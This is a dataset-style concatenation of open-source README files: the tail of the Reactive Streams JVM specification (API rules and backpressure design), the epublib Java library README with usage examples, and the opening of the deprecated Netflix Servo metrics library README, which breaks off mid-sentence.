-  <artifactId>reactive-streams-tck</artifactId>
-  <version>1.0.4</version>
-  <scope>test</scope>
-</dependency>
-```
-
-## Goals, Design and Scope ##
-
-Handling streams of data—especially “live” data whose volume is not predetermined—requires special care in an asynchronous system. The most prominent issue is that resource consumption needs to be carefully controlled such that a fast data source does not overwhelm the stream destination. Asynchrony is needed in order to enable the parallel use of computing resources, on collaborating network hosts or multiple CPU cores within a single machine.
-
-The main goal of Reactive Streams is to govern the exchange of stream data across an asynchronous boundary – think passing elements on to another thread or thread-pool — while ensuring that the receiving side is not forced to buffer arbitrary amounts of data. In other words, backpressure is an integral part of this model in order to allow the queues which mediate between threads to be bounded. The benefits of asynchronous processing would be negated if the backpressure signals were synchronous (see also the [Reactive Manifesto](http://reactivemanifesto.org/)), therefore care has been taken to mandate fully non-blocking and asynchronous behavior of all aspects of a Reactive Streams implementation.
-
-It is the intention of this specification to allow the creation of many conforming implementations, which by virtue of abiding by the rules will be able to interoperate smoothly, preserving the aforementioned benefits and characteristics across the whole processing graph of a stream application. 
- -It should be noted that the precise nature of stream manipulations (transformation, splitting, merging, etc.) is not covered by this specification. Reactive Streams are only concerned with mediating the stream of data between different [API Components](#api-components). In their development care has been taken to ensure that all basic ways of combining streams can be expressed. - -In summary, Reactive Streams is a standard and specification for Stream-oriented libraries for the JVM that - - - process a potentially unbounded number of elements - - in sequence, - - asynchronously passing elements between components, - - with mandatory non-blocking backpressure. - -The Reactive Streams specification consists of the following parts: - -***The API*** specifies the types to implement Reactive Streams and achieve interoperability between different implementations. - -***The Technology Compatibility Kit (TCK)*** is a standard test suite for conformance testing of implementations. - -Implementations are free to implement additional features not covered by the specification as long as they conform to the API requirements and pass the tests in the TCK. - -### API Components ### - -The API consists of the following components that are required to be provided by Reactive Stream implementations: - -1. Publisher -2. Subscriber -3. Subscription -4. Processor - -A *Publisher* is a provider of a potentially unbounded number of sequenced elements, publishing them according to the demand received from its Subscriber(s). - -In response to a call to `Publisher.subscribe(Subscriber)` the possible invocation sequences for methods on the `Subscriber` are given by the following protocol: - -``` -onSubscribe onNext* (onError | onComplete)? 
-``` - -This means that `onSubscribe` is always signalled, -followed by a possibly unbounded number of `onNext` signals (as requested by `Subscriber`) followed by an `onError` signal if there is a failure, or an `onComplete` signal when no more elements are available—all as long as the `Subscription` is not cancelled. - -#### NOTES - -- The specifications below use binding words in capital letters from https://www.ietf.org/rfc/rfc2119.txt - -### Glossary - -| Term | Definition | -| ------------------------- | ------------------------------------------------------------------------------------------------------ | -| Signal | As a noun: one of the `onSubscribe`, `onNext`, `onComplete`, `onError`, `request(n)` or `cancel` methods. As a verb: calling/invoking a signal. | -| Demand | As a noun, the aggregated number of elements requested by a Subscriber which is yet to be delivered (fulfilled) by the Publisher. As a verb, the act of `request`-ing more elements. | -| Synchronous(ly) | Executes on the calling Thread. | -| Return normally | Only ever returns a value of the declared type to the caller. The only legal way to signal failure to a `Subscriber` is via the `onError` method.| -| Responsivity | Readiness/ability to respond. In this document used to indicate that the different components should not impair each others ability to respond. | -| Non-obstructing | Quality describing a method which is as quick to execute as possible—on the calling thread. This means, for example, avoids heavy computations and other things that would stall the caller´s thread of execution. | -| Terminal state | For a Publisher: When `onComplete` or `onError` has been signalled. For a Subscriber: When an `onComplete` or `onError` has been received.| -| NOP | Execution that has no detectable effect to the calling thread, and can as such safely be called any number of times.| -| Serial(ly) | In the context of a [Signal](#term_signal), non-overlapping. 
In the context of the JVM, calls to methods on an object are serial if and only if there is a happens-before relationship between those calls (implying also that the calls do not overlap). When the calls are performed asynchronously, coordination to establish the happens-before relationship is to be implemented using techniques such as, but not limited to, atomics, monitors, or locks. |
-| Thread-safe | Can be safely invoked synchronously, or asynchronously, without requiring external synchronization to ensure program correctness. |
-
-### SPECIFICATION
-
-#### 1. Publisher ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Publisher.java))
-
-```java
-public interface Publisher<T> {
-    public void subscribe(Subscriber<? super T> s);
-}
-```
-
-| ID | Rule |
-| ------------------------- | ------------------------------------------------------------------------------------------------------ |
-| 1 | The total number of `onNext`´s signalled by a `Publisher` to a `Subscriber` MUST be less than or equal to the total number of elements requested by that `Subscriber`´s `Subscription` at all times. |
-| [:bulb:](#1.1 ""1.1 explained"") | *The intent of this rule is to make it clear that Publishers cannot signal more elements than Subscribers have requested. There’s an implicit, but important, consequence to this rule: Since demand can only be fulfilled after it has been received, there’s a happens-before relationship between requesting elements and receiving elements.* |
-| 2 | A `Publisher` MAY signal fewer `onNext` than requested and terminate the `Subscription` by calling `onComplete` or `onError`.
| -| [:bulb:](#1.2 ""1.2 explained"") | *The intent of this rule is to make it clear that a Publisher cannot guarantee that it will be able to produce the number of elements requested; it simply might not be able to produce them all; it may be in a failed state; it may be empty or otherwise already completed.* | -| 3 | `onSubscribe`, `onNext`, `onError` and `onComplete` signaled to a `Subscriber` MUST be signaled [serially](#term_serially). | -| [:bulb:](#1.3 ""1.3 explained"") | *The intent of this rule is to permit the signalling of signals (including from multiple threads) if and only if a happens-before relation between each of the signals is established.* | -| 4 | If a `Publisher` fails it MUST signal an `onError`. | -| [:bulb:](#1.4 ""1.4 explained"") | *The intent of this rule is to make it clear that a Publisher is responsible for notifying its Subscribers if it detects that it cannot proceed—Subscribers must be given a chance to clean up resources or otherwise deal with the Publisher´s failures.* | -| 5 | If a `Publisher` terminates successfully (finite stream) it MUST signal an `onComplete`. | -| [:bulb:](#1.5 ""1.5 explained"") | *The intent of this rule is to make it clear that a Publisher is responsible for notifying its Subscribers that it has reached a [terminal state](#term_terminal_state)—Subscribers can then act on this information; clean up resources, etc.* | -| 6 | If a `Publisher` signals either `onError` or `onComplete` on a `Subscriber`, that `Subscriber`’s `Subscription` MUST be considered cancelled. | -| [:bulb:](#1.6 ""1.6 explained"") | *The intent of this rule is to make sure that a Subscription is treated the same no matter if it was cancelled, the Publisher signalled onError or onComplete.* | -| 7 | Once a [terminal state](#term_terminal_state) has been signaled (`onError`, `onComplete`) it is REQUIRED that no further signals occur. 
| -| [:bulb:](#1.7 ""1.7 explained"") | *The intent of this rule is to make sure that onError and onComplete are the final states of an interaction between a Publisher and Subscriber pair.* | -| 8 | If a `Subscription` is cancelled its `Subscriber` MUST eventually stop being signaled. | -| [:bulb:](#1.8 ""1.8 explained"") | *The intent of this rule is to make sure that Publishers respect a Subscriber’s request to cancel a Subscription when Subscription.cancel() has been called. The reason for **eventually** is because signals can have propagation delay due to being asynchronous.* | -| 9 | `Publisher.subscribe` MUST call `onSubscribe` on the provided `Subscriber` prior to any other signals to that `Subscriber` and MUST [return normally](#term_return_normally), except when the provided `Subscriber` is `null` in which case it MUST throw a `java.lang.NullPointerException` to the caller, for all other situations the only legal way to signal failure (or reject the `Subscriber`) is by calling `onError` (after calling `onSubscribe`). | -| [:bulb:](#1.9 ""1.9 explained"") | *The intent of this rule is to make sure that `onSubscribe` is always signalled before any of the other signals, so that initialization logic can be executed by the Subscriber when the signal is received. Also `onSubscribe` MUST only be called at most once, [see [2.12](#2.12)]. If the supplied `Subscriber` is `null`, there is nowhere else to signal this but to the caller, which means a `java.lang.NullPointerException` must be thrown. Examples of possible situations: A stateful Publisher can be overwhelmed, bounded by a finite number of underlying resources, exhausted, or in a [terminal state](#term_terminal_state).* | -| 10 | `Publisher.subscribe` MAY be called as many times as wanted but MUST be with a different `Subscriber` each time [see [2.12](#2.12)]. 
|
-| [:bulb:](#1.10 ""1.10 explained"") | *The intent of this rule is to have callers of `subscribe` be aware that a generic Publisher and a generic Subscriber cannot be assumed to support being attached multiple times. Furthermore, it also mandates that the semantics of `subscribe` must be upheld no matter how many times it is called.* |
-| 11 | A `Publisher` MAY support multiple `Subscriber`s and decides whether each `Subscription` is unicast or multicast. |
-| [:bulb:](#1.11 ""1.11 explained"") | *The intent of this rule is to give Publisher implementations the flexibility to decide how many, if any, Subscribers they will support, and how elements are going to be distributed.* |
-
-#### 2. Subscriber ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Subscriber.java))
-
-```java
-public interface Subscriber<T> {
-    public void onSubscribe(Subscription s);
-    public void onNext(T t);
-    public void onError(Throwable t);
-    public void onComplete();
-}
-```
-
-| ID | Rule |
-| ------------------------- | ------------------------------------------------------------------------------------------------------ |
-| 1 | A `Subscriber` MUST signal demand via `Subscription.request(long n)` to receive `onNext` signals. |
-| [:bulb:](#2.1 ""2.1 explained"") | *The intent of this rule is to establish that it is the responsibility of the Subscriber to decide when and how many elements it is able and willing to receive. To avoid signal reordering caused by reentrant Subscription methods, it is strongly RECOMMENDED for synchronous Subscriber implementations to invoke Subscription methods at the very end of any signal processing.
It is RECOMMENDED that Subscribers request the upper limit of what they are able to process, as requesting only one element at a time results in an inherently inefficient ""stop-and-wait"" protocol.* | -| 2 | If a `Subscriber` suspects that its processing of signals will negatively impact its `Publisher`´s responsivity, it is RECOMMENDED that it asynchronously dispatches its signals. | -| [:bulb:](#2.2 ""2.2 explained"") | *The intent of this rule is that a Subscriber should [not obstruct](#term_non-obstructing) the progress of the Publisher from an execution point-of-view. In other words, the Subscriber should not starve the Publisher from receiving CPU cycles.* | -| 3 | `Subscriber.onComplete()` and `Subscriber.onError(Throwable t)` MUST NOT call any methods on the `Subscription` or the `Publisher`. | -| [:bulb:](#2.3 ""2.3 explained"") | *The intent of this rule is to prevent cycles and race-conditions—between Publisher, Subscription and Subscriber—during the processing of completion signals.* | -| 4 | `Subscriber.onComplete()` and `Subscriber.onError(Throwable t)` MUST consider the Subscription cancelled after having received the signal. | -| [:bulb:](#2.4 ""2.4 explained"") | *The intent of this rule is to make sure that Subscribers respect a Publisher’s [terminal state](#term_terminal_state) signals. A Subscription is simply not valid anymore after an onComplete or onError signal has been received.* | -| 5 | A `Subscriber` MUST call `Subscription.cancel()` on the given `Subscription` after an `onSubscribe` signal if it already has an active `Subscription`. | -| [:bulb:](#2.5 ""2.5 explained"") | *The intent of this rule is to prevent that two, or more, separate Publishers from trying to interact with the same Subscriber. Enforcing this rule means that resource leaks are prevented since extra Subscriptions will be cancelled. Failure to conform to this rule may lead to violations of Publisher rule 1, amongst others. 
Such violations can lead to hard-to-diagnose bugs.* | -| 6 | A `Subscriber` MUST call `Subscription.cancel()` if the `Subscription` is no longer needed. | -| [:bulb:](#2.6 ""2.6 explained"") | *The intent of this rule is to establish that Subscribers cannot just throw Subscriptions away when they are no longer needed, they have to call `cancel` so that resources held by that Subscription can be safely, and timely, reclaimed. An example of this would be a Subscriber which is only interested in a specific element, which would then cancel its Subscription to signal its completion to the Publisher.* | -| 7 | A Subscriber MUST ensure that all calls on its Subscription's request and cancel methods are performed [serially](#term_serially). | -| [:bulb:](#2.7 ""2.7 explained"") | *The intent of this rule is to permit the calling of the request and cancel methods (including from multiple threads) if and only if a [serial](#term_serially) relation between each of the calls is established.* | -| 8 | A `Subscriber` MUST be prepared to receive one or more `onNext` signals after having called `Subscription.cancel()` if there are still requested elements pending [see [3.12](#3.12)]. `Subscription.cancel()` does not guarantee to perform the underlying cleaning operations immediately. | -| [:bulb:](#2.8 ""2.8 explained"") | *The intent of this rule is to highlight that there may be a delay between calling `cancel` and the Publisher observing that cancellation.* | -| 9 | A `Subscriber` MUST be prepared to receive an `onComplete` signal with or without a preceding `Subscription.request(long n)` call. | -| [:bulb:](#2.9 ""2.9 explained"") | *The intent of this rule is to establish that completion is unrelated to the demand flow—this allows for streams which complete early, and obviates the need to *poll* for completion.* | -| 10 | A `Subscriber` MUST be prepared to receive an `onError` signal with or without a preceding `Subscription.request(long n)` call. 
| -| [:bulb:](#2.10 ""2.10 explained"") | *The intent of this rule is to establish that Publisher failures may be completely unrelated to signalled demand. This means that Subscribers do not need to poll to find out if the Publisher will not be able to fulfill its requests.* | -| 11 | A `Subscriber` MUST make sure that all calls on its [signal](#term_signal) methods happen-before the processing of the respective signals. I.e. the Subscriber must take care of properly publishing the signal to its processing logic. | -| [:bulb:](#2.11 ""2.11 explained"") | *The intent of this rule is to establish that it is the responsibility of the Subscriber implementation to make sure that asynchronous processing of its signals are thread safe. See [JMM definition of Happens-Before in section 17.4.5](https://docs.oracle.com/javase/specs/jls/se8/html/jls-17.html#jls-17.4.5).* | -| 12 | `Subscriber.onSubscribe` MUST be called at most once for a given `Subscriber` (based on object equality). | -| [:bulb:](#2.12 ""2.12 explained"") | *The intent of this rule is to establish that it MUST be assumed that the same Subscriber can only be subscribed at most once. Note that `object equality` is `a.equals(b)`.* | -| 13 | Calling `onSubscribe`, `onNext`, `onError` or `onComplete` MUST [return normally](#term_return_normally) except when any provided parameter is `null` in which case it MUST throw a `java.lang.NullPointerException` to the caller, for all other situations the only legal way for a `Subscriber` to signal failure is by cancelling its `Subscription`. In the case that this rule is violated, any associated `Subscription` to the `Subscriber` MUST be considered as cancelled, and the caller MUST raise this error condition in a fashion that is adequate for the runtime environment. | -| [:bulb:](#2.13 ""2.13 explained"") | *The intent of this rule is to establish the semantics for the methods of Subscriber and what the Publisher is allowed to do in which case this rule is violated. 
«Raise this error condition in a fashion that is adequate for the runtime environment» could mean logging the error—or otherwise make someone or something aware of the situation—as the error cannot be signalled to the faulty Subscriber.* | - -#### 3. Subscription ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Subscription.java)) - -```java -public interface Subscription { - public void request(long n); - public void cancel(); -} -```` - -| ID | Rule | -| ------------------------- | ------------------------------------------------------------------------------------------------------ | -| 1 | `Subscription.request` and `Subscription.cancel` MUST only be called inside of its `Subscriber` context. | -| [:bulb:](#3.1 ""3.1 explained"") | *The intent of this rule is to establish that a Subscription represents the unique relationship between a Subscriber and a Publisher [see [2.12](#2.12)]. The Subscriber is in control over when elements are requested and when more elements are no longer needed.* | -| 2 | The `Subscription` MUST allow the `Subscriber` to call `Subscription.request` synchronously from within `onNext` or `onSubscribe`. | -| [:bulb:](#3.2 ""3.2 explained"") | *The intent of this rule is to make it clear that implementations of `request` must be reentrant, to avoid stack overflows in the case of mutual recursion between `request` and `onNext` (and eventually `onComplete` / `onError`). This implies that Publishers can be `synchronous`, i.e. signalling `onNext`´s on the thread which calls `request`.* | -| 3 | `Subscription.request` MUST place an upper bound on possible synchronous recursion between `Publisher` and `Subscriber`. | -| [:bulb:](#3.3 ""3.3 explained"") | *The intent of this rule is to complement [see [3.2](#3.2)] by placing an upper limit on the mutual recursion between `request` and `onNext` (and eventually `onComplete` / `onError`). 
Implementations are RECOMMENDED to limit this mutual recursion to a depth of `1` (ONE)—for the sake of conserving stack space. An example for undesirable synchronous, open recursion would be Subscriber.onNext -> Subscription.request -> Subscriber.onNext -> …, as it otherwise will result in blowing the calling thread´s stack.* | -| 4 | `Subscription.request` SHOULD respect the responsivity of its caller by returning in a timely manner. | -| [:bulb:](#3.4 ""3.4 explained"") | *The intent of this rule is to establish that `request` is intended to be a [non-obstructing](#term_non-obstructing) method, and should be as quick to execute as possible on the calling thread, so avoid heavy computations and other things that would stall the caller´s thread of execution.* | -| 5 | `Subscription.cancel` MUST respect the responsivity of its caller by returning in a timely manner, MUST be idempotent and MUST be [thread-safe](#term_thread-safe). | -| [:bulb:](#3.5 ""3.5 explained"") | *The intent of this rule is to establish that `cancel` is intended to be a [non-obstructing](#term_non-obstructing) method, and should be as quick to execute as possible on the calling thread, so avoid heavy computations and other things that would stall the caller´s thread of execution. Furthermore, it is also important that it is possible to call it multiple times without any adverse effects.* | -| 6 | After the `Subscription` is cancelled, additional `Subscription.request(long n)` MUST be [NOPs](#term_nop). | -| [:bulb:](#3.6 ""3.6 explained"") | *The intent of this rule is to establish a causal relationship between cancellation of a subscription and the subsequent non-operation of requesting more elements.* | -| 7 | After the `Subscription` is cancelled, additional `Subscription.cancel()` MUST be [NOPs](#term_nop). 
| -| [:bulb:](#3.7 ""3.7 explained"") | *The intent of this rule is superseded by [3.5](#3.5).* | -| 8 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MUST register the given number of additional elements to be produced to the respective subscriber. | -| [:bulb:](#3.8 ""3.8 explained"") | *The intent of this rule is to make sure that `request`-ing is an additive operation, as well as ensuring that a request for elements is delivered to the Publisher.* | -| 9 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MUST signal `onError` with a `java.lang.IllegalArgumentException` if the argument is <= 0. The cause message SHOULD explain that non-positive request signals are illegal. | -| [:bulb:](#3.9 ""3.9 explained"") | *The intent of this rule is to prevent faulty implementations to proceed operation without any exceptions being raised. Requesting a negative or 0 number of elements, since requests are additive, most likely to be the result of an erroneous calculation on the behalf of the Subscriber.* | -| 10 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MAY synchronously call `onNext` on this (or other) subscriber(s). | -| [:bulb:](#3.10 ""3.10 explained"") | *The intent of this rule is to establish that it is allowed to create synchronous Publishers, i.e. Publishers who execute their logic on the calling thread.* | -| 11 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MAY synchronously call `onComplete` or `onError` on this (or other) subscriber(s). | -| [:bulb:](#3.11 ""3.11 explained"") | *The intent of this rule is to establish that it is allowed to create synchronous Publishers, i.e. Publishers who execute their logic on the calling thread.* | -| 12 | While the `Subscription` is not cancelled, `Subscription.cancel()` MUST request the `Publisher` to eventually stop signaling its `Subscriber`. 
The operation is NOT REQUIRED to affect the `Subscription` immediately. | -| [:bulb:](#3.12 ""3.12 explained"") | *The intent of this rule is to establish that the desire to cancel a Subscription is eventually respected by the Publisher, acknowledging that it may take some time before the signal is received.* | -| 13 | While the `Subscription` is not cancelled, `Subscription.cancel()` MUST request the `Publisher` to eventually drop any references to the corresponding subscriber. | -| [:bulb:](#3.13 ""3.13 explained"") | *The intent of this rule is to make sure that Subscribers can be properly garbage-collected after their subscription no longer being valid. Re-subscribing with the same Subscriber object is discouraged [see [2.12](#2.12)], but this specification does not mandate that it is disallowed since that would mean having to store previously cancelled subscriptions indefinitely.* | -| 14 | While the `Subscription` is not cancelled, calling `Subscription.cancel` MAY cause the `Publisher`, if stateful, to transition into the `shut-down` state if no other `Subscription` exists at this point [see [1.9](#1.9)]. | -| [:bulb:](#3.14 ""3.14 explained"") | *The intent of this rule is to allow for Publishers to signal `onComplete` or `onError` following `onSubscribe` for new Subscribers in response to a cancellation signal from an existing Subscriber.* | -| 15 | Calling `Subscription.cancel` MUST [return normally](#term_return_normally). | -| [:bulb:](#3.15 ""3.15 explained"") | *The intent of this rule is to disallow implementations to throw exceptions in response to `cancel` being called.* | -| 16 | Calling `Subscription.request` MUST [return normally](#term_return_normally). 
|
-| [:bulb:](#3.16 ""3.16 explained"") | *The intent of this rule is to disallow implementations to throw exceptions in response to `request` being called.* |
-| 17 | A `Subscription` MUST support an unbounded number of calls to `request` and MUST support a demand up to 2^63-1 (`java.lang.Long.MAX_VALUE`). A demand equal or greater than 2^63-1 (`java.lang.Long.MAX_VALUE`) MAY be considered by the `Publisher` as “effectively unbounded”. |
-| [:bulb:](#3.17 ""3.17 explained"") | *The intent of this rule is to establish that the Subscriber can request an unbounded number of elements, in any increment above 0 [see [3.9](#3.9)], in any number of invocations of `request`. As it is not feasibly reachable with current or foreseen hardware within a reasonable amount of time (1 element per nanosecond would take 292 years) to fulfill a demand of 2^63-1, it is allowed for a Publisher to stop tracking demand beyond this point.* |
-
-A `Subscription` is shared by exactly one `Publisher` and one `Subscriber` for the purpose of mediating the data exchange between this pair. This is the reason why the `subscribe()` method does not return the created `Subscription`, but instead returns `void`; the `Subscription` is only passed to the `Subscriber` via the `onSubscribe` callback.
-
-#### 4. Processor ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Processor.java))
-
-```java
-public interface Processor<T, R> extends Subscriber<T>, Publisher<R> {
-}
-```
-
-| ID | Rule |
-| ------------------------ | ------------------------------------------------------------------------------------------------------ |
-| 1 | A `Processor` represents a processing stage—which is both a `Subscriber` and a `Publisher` and MUST obey the contracts of both.
| -| [:bulb:](#4.1 ""4.1 explained"") | *The intent of this rule is to establish that Processors behave, and are bound by, both the Publisher and Subscriber specifications.* | -| 2 | A `Processor` MAY choose to recover an `onError` signal. If it chooses to do so, it MUST consider the `Subscription` cancelled, otherwise it MUST propagate the `onError` signal to its Subscribers immediately. | -| [:bulb:](#4.2 ""4.2 explained"") | *The intent of this rule is to inform that it’s possible for implementations to be more than simple transformations.* | - -While not mandated, it can be a good idea to cancel a `Processor`´s upstream `Subscription` when/if its last `Subscriber` cancels their `Subscription`, -to let the cancellation signal propagate upstream. - -### Asynchronous vs Synchronous Processing ### - -The Reactive Streams API prescribes that all processing of elements (`onNext`) or termination signals (`onError`, `onComplete`) MUST NOT *block* the `Publisher`. However, each of the `on*` handlers can process the events synchronously or asynchronously. - -Take this example: - -``` -nioSelectorThreadOrigin map(f) filter(p) consumeTo(toNioSelectorOutput) -``` - -It has an async origin and an async destination. Let’s assume that both origin and destination are selector event loops. The `Subscription.request(n)` must be chained from the destination to the origin. This is now where each implementation can choose how to do this. - -The following uses the pipe `|` character to signal async boundaries (queue and schedule) and `R#` to represent resources (possibly threads). - -``` -nioSelectorThreadOrigin | map(f) | filter(p) | consumeTo(toNioSelectorOutput) --------------- R1 ---- | - R2 - | -- R3 --- | ---------- R4 ---------------- -``` - -In this example each of the 3 consumers, `map`, `filter` and `consumeTo` asynchronously schedule the work. It could be on the same event loop (trampoline), separate threads, whatever. 
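To make the role of such an asynchronous boundary concrete, here is a minimal, hypothetical sketch (not part of the specification, and deliberately not using the Reactive Streams interfaces): the boundary marked by `|` is modelled as a bounded queue, with the consumer stage running on its own thread. The class name `AsyncBoundary`, the method `runPipeline`, and the queue capacity of 8 are illustrative assumptions:

```java
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.ArrayBlockingQueue;
import java.util.concurrent.BlockingQueue;

// Hypothetical sketch: the pipe in the diagrams above corresponds to a bounded
// queue plus a consumer thread. R1 is the calling thread, R2 drains the queue.
public class AsyncBoundary {
    private static final int POISON = Integer.MIN_VALUE; // end-of-stream marker

    static List<Integer> runPipeline(List<Integer> source) {
        BlockingQueue<Integer> boundary = new ArrayBlockingQueue<>(8); // the bound
        List<Integer> sink = new ArrayList<>();
        Thread r2 = new Thread(() -> {
            try {
                // filter(p) and map(f) fused on the consumer side of the boundary
                for (int v; (v = boundary.take()) != POISON; ) {
                    if (v % 2 == 0) sink.add(v * 10);
                }
            } catch (InterruptedException e) {
                Thread.currentThread().interrupt();
            }
        });
        r2.start();
        try {
            for (int v : source) boundary.put(v); // put() blocks once 8 elements are queued
            boundary.put(POISON);
            r2.join(); // join() establishes happens-before, so sink is safe to read here
        } catch (InterruptedException e) {
            throw new IllegalStateException(e);
        }
        return sink;
    }

    public static void main(String[] args) {
        System.out.println(runPipeline(List.of(1, 2, 3, 4))); // prints [20, 40]
    }
}
```

Because `put` blocks once the queue reaches its bound, a fast producer is slowed to the consumer's pace; a Reactive Streams implementation maintains the same bound without blocking, by only `request`-ing as many elements as its queue can hold.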
- -``` -nioSelectorThreadOrigin map(f) filter(p) | consumeTo(toNioSelectorOutput) -------------------- R1 ----------------- | ---------- R2 ---------------- -``` - -Here it is only the final step that asynchronously schedules, by adding work to the NioSelectorOutput event loop. The `map` and `filter` steps are synchronously performed on the origin thread. - -Or another implementation could fuse the operations to the final consumer: - -``` -nioSelectorThreadOrigin | map(f) filter(p) consumeTo(toNioSelectorOutput) ---------- R1 ---------- | ------------------ R2 ------------------------- -``` - -All of these variants are ""asynchronous streams"". They all have their place and each has different tradeoffs including performance and implementation complexity. - -The Reactive Streams contract allows implementations the flexibility to manage resources and scheduling and mix asynchronous and synchronous processing within the bounds of a non-blocking, asynchronous, dynamic push-pull stream. - -In order to allow fully asynchronous implementations of all participating API elements—`Publisher`/`Subscription`/`Subscriber`/`Processor`—all methods defined by these interfaces return `void`. - -### Subscriber controlled queue bounds ### - -One of the underlying design principles is that all buffer sizes are to be bounded and these bounds must be *known* and *controlled* by the subscribers. These bounds are expressed in terms of *element count* (which in turn translates to the invocation count of onNext). Any implementation that aims to support infinite streams (especially high output rate streams) needs to enforce bounds all along the way to avoid out-of-memory errors and constrain resource usage in general. - -Since back-pressure is mandatory the use of unbounded buffers can be avoided. 
In general, the only time when a queue might grow without bounds is when the publisher side maintains a higher rate than the subscriber for an extended period of time, but this scenario is handled by backpressure instead. - -Queue bounds can be controlled by a subscriber signaling demand for the appropriate number of elements. At any point in time the subscriber knows: - - - the total number of elements requested: `P` - - the number of elements that have been processed: `N` - -Then the maximum number of elements that may arrive—until more demand is signaled to the Publisher—is `P - N`. In the case that the subscriber also knows the number of elements B in its input buffer then this bound can be refined to `P - B - N`. - -These bounds must be respected by a publisher independent of whether the source it represents can be backpressured or not. In the case of sources whose production rate cannot be influenced—for example clock ticks or mouse movement—the publisher must choose to either buffer or drop elements to obey the imposed bounds. - -Subscribers signaling a demand for one element after the reception of an element effectively implement a Stop-and-Wait protocol where the demand signal is equivalent to acknowledgement. By providing demand for multiple elements the cost of acknowledgement is amortized. It is worth noting that the subscriber is allowed to signal demand at any point in time, allowing it to avoid unnecessary delays between the publisher and the subscriber (i.e. keeping its input buffer filled without having to wait for full round-trips). - -## Legal - -This project is a collaboration between engineers from Kaazing, Lightbend, Netflix, Pivotal, Red Hat, Twitter and many others. This project is licensed under MIT No Attribution (SPDX: MIT-0). -",0 -psiegman/epublib,a java library for reading and writing epub files,2009-11-18T09:37:52Z,,"# epublib -Epublib is a java library for reading/writing/manipulating epub files. 
- -It consists of 2 parts: a core that reads/writes epub and a collection of tools. -The tools contain an epub cleanup tool, a tool to create epubs from html files, a tool to create an epub from an uncompress html file. -It also contains a swing-based epub viewer. -![Epublib viewer](http://www.siegmann.nl/wp-content/uploads/Alice%E2%80%99s-Adventures-in-Wonderland_2011-01-30_18-17-30.png) - -The core runs both on android and a standard java environment. The tools run only on a standard java environment. - -This means that reading/writing epub files works on Android. - -## Build status -* Travis Build Status: [![Build Status](https://travis-ci.org/psiegman/epublib.svg?branch=master)](https://travis-ci.org/psiegman/epublib) - -## Command line examples - -Set the author of an existing epub - java -jar epublib-3.0-SNAPSHOT.one-jar.jar --in input.epub --out result.epub --author Tester,Joe - -Set the cover image of an existing epub - java -jar epublib-3.0-SNAPSHOT.one-jar.jar --in input.epub --out result.epub --cover-image my_cover.jpg - -## Creating an epub programmatically - - package nl.siegmann.epublib.examples; - - import java.io.InputStream; - import java.io.FileOutputStream; - - import nl.siegmann.epublib.domain.Author; - import nl.siegmann.epublib.domain.Book; - import nl.siegmann.epublib.domain.Metadata; - import nl.siegmann.epublib.domain.Resource; - import nl.siegmann.epublib.domain.TOCReference; - - import nl.siegmann.epublib.epub.EpubWriter; - - public class Translator { - private static InputStream getResource( String path ) { - return Translator.class.getResourceAsStream( path ); - } - - private static Resource getResource( String path, String href ) { - return new Resource( getResource( path ), href ); - } - - public static void main(String[] args) { - try { - // Create new Book - Book book = new Book(); - Metadata metadata = book.getMetadata(); - - // Set the title - metadata.addTitle(""Epublib test book 1""); - - // Add an Author - 
metadata.addAuthor(new Author(""Joe"", ""Tester"")); - - // Set cover image - book.setCoverImage( - getResource(""/book1/test_cover.png"", ""cover.png"") ); - - // Add Chapter 1 - book.addSection(""Introduction"", - getResource(""/book1/chapter1.html"", ""chapter1.html"") ); - - // Add css file - book.getResources().add( - getResource(""/book1/book1.css"", ""book1.css"") ); - - // Add Chapter 2 - TOCReference chapter2 = book.addSection( ""Second Chapter"", - getResource(""/book1/chapter2.html"", ""chapter2.html"") ); - - // Add image used by Chapter 2 - book.getResources().add( - getResource(""/book1/flowers_320x240.jpg"", ""flowers.jpg"")); - - // Add Chapter2, Section 1 - book.addSection(chapter2, ""Chapter 2, section 1"", - getResource(""/book1/chapter2_1.html"", ""chapter2_1.html"")); - - // Add Chapter 3 - book.addSection(""Conclusion"", - getResource(""/book1/chapter3.html"", ""chapter3.html"")); - - // Create EpubWriter - EpubWriter epubWriter = new EpubWriter(); - - // Write the Book as Epub - epubWriter.write(book, new FileOutputStream(""test1_book1.epub"")); - } catch (Exception e) { - e.printStackTrace(); - } - } - } - - -## Usage in Android - -Add the following lines to your `app` module's `build.gradle` file: - - repositories { - maven { - url 'https://github.com/psiegman/mvn-repo/raw/master/releases' - } - } - - dependencies { - implementation('nl.siegmann.epublib:epublib-core:4.0') { - exclude group: 'org.slf4j' - exclude group: 'xmlpull' - } - implementation 'org.slf4j:slf4j-android:1.7.25' - } -",0 -Netflix/servo,Netflix Application Monitoring Library,2011-12-16T21:09:27Z,,"# DEPRECATED - -This project receives minimal maintenance to keep software that relies on it working. There -is no active development or planned feature improvement. For any new projects it is recommended -to use the [Spectator] library instead. - -For more details see the [Servo comparison] page in the Spectator docs. 
- -[Spectator]: https://github.com/Netflix/spectator -[Servo comparison]: http://netflix.github.io/spectator/en/latest/intro/servo-comparison/ - -# No-Op Registry - -As of version 0.13.0, the default monitor registry is a no-op implementation to minimize -the overhead for legacy apps that still happen to have some usage of Servo. If the previous -behavior is needed, then set the following system property: - -``` -com.netflix.servo.DefaultMonitorRegistry.registryClass=com.netflix.servo.jmx.JmxMonitorRegistry -``` - -# Servo: Application Metrics in Java - -> servo v. : WATCH OVER, OBSERVE - ->Latin. - -Servo provides a simple interface for exposing and publishing application metrics in Java. The primary goals are: - -* **Leverage JMX**: JMX is the standard monitoring interface for Java and can be queried by many existing tools. -* **Keep It Simple**: It should be trivial to expose metrics and publish metrics without having to write lots of code such as [MBean interfaces](http://docs.oracle.com/javase/tutorial/jmx/mbeans/standard.html). -* **Flexible Publishing**: Once metrics are exposed, it should be easy to regularly poll the metrics and make them available for internal reporting systems, logs, and services like [Amazon 